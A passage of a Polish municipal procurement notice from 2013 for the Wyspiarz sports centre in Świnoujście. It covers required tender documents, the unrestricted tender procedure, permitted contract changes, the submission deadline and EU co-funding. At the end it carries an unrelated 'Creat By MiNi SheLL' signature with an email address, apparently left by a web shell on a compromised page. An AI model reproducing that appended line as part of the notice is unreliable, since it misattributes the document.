2.	Wykaz z określeniem części zamówienia, które wykonawca zamierza powierzyć innym podmiotom (podwykonawcom). Zamawiający zaleca zamieszczenia powyższej informacji na formularzu stanowiącym załącznik nr 6 do SIWZ. Nie załączenie do oferty wykazu Zamawiający uzna za równoważne z informacją o wykonaniu przez Wykonawcę zamówienia własnymi siłami.
3.	Lista podmiotów należących do tej samej grupy kapitałowej lub informacja o tym, że wykonawca nie należy do grupy kapitałowej na formularzu stanowiącym załącznik nr 3 do SIWZ.
4.	Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 oraz na podstawie art. 26 ust. 2b ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów, wymagane jest dołączenie pisemnego zobowiązania tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy realizacji zamówienia.
5.	Dokument potwierdzający zabezpieczenie oferty akceptowaną formą wadium. 
-	W przypadku zabezpieczenia określonego w art. 45 ust. 6 pkt 1 ustawy Prawo zamówień publicznych - jest to kopia potwierdzenia przelewu na konto Zamawiającego wskazane w punkcie 13.3.1
-	W przypadku zabezpieczenia określonego w art. 45 ust. 6 pkt 2 do 5 ustawy Prawo zamówień publicznych - oryginał takiego dokumentu (np. gwarancji ubezpieczeniowej, bankowej, itp.).
6.	Upoważnienie osoby podpisującej ofertę (gdy nie wynika to z treści innych dokumentów oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy jest dopuszczalna zgodnie z art. 144 ustawy Prawo zamówień publicznych wyłącznie w niżej przytoczonym zakresie określonym w § 19 w projekcie umowy stanowiącym załącznik nr 2.0 do SIWZ:
1.Dopuszcza się następujące zmiany treści umowy:
a)	zmiana stawki  VAT oraz wynagrodzenia brutto określonego w §5;
b)	zmniejszenie zakresu przedmiotu Zamówienia i stosowne zmniejszenie wynagrodzenia Wykonawcy, gdy wykonanie zamówienia w pierwotnym zakresie nie leży w interesie publicznym;
c)	zmiana terminu realizacji przedmiotu zamówienia, w przypadku;
- działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie,
2.Zmiany umowy przewidziane w ust.1 dopuszczalne są w następujących warunkach :
a)	ad ust.1 lit. a)-stawka podatku VAT ulegnie zmianie na mocy powszechnie obowiązujących przepisów,
b)	ad. ust.1 lit. b) -zmniejszenie zakresu przedmiotu umowy, i związane z tym stosowne zmniejszenie wynagrodzenia ryczałtowego Wykonawcy- w granicach uzasadnionego interesu publicznego,
c)	ad ust. 1 lit. c)- zmiana terminu realizacji przedmiotu zamówienia:
- tiret pierwsze: o okres działania siły wyższej oraz potrzeby do usunięcia skutków tego działania,
3.W sprawach nie uregulowanych niniejszą umową mają zastosowanie obowiązujące przepisy , w tym ustawy Kodeks cywilny oraz ustaw i przepisów wykonawczych do nich:
- Prawo zamówień publicznych,
-Prawo budowlane,
-Prawo ochrony środowiska.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.swinoujscie.pl; www.osir.uznam.net.pl ; www.nbq.pl; www.bip.pl .<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji WYSPIARZ w Świnoujściu
ul. Matejki 22 , 72-600 Świnoujście.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2013 godzina 12:00, miejsce: siedziba Zamawiającego- Ośrodek Sportu i Rekreacji WYSPIARZ w Świnoujściu
ul. Matejki 22 , 72-600 Świnoujście ,sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie/projekt/ dofinansowane w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com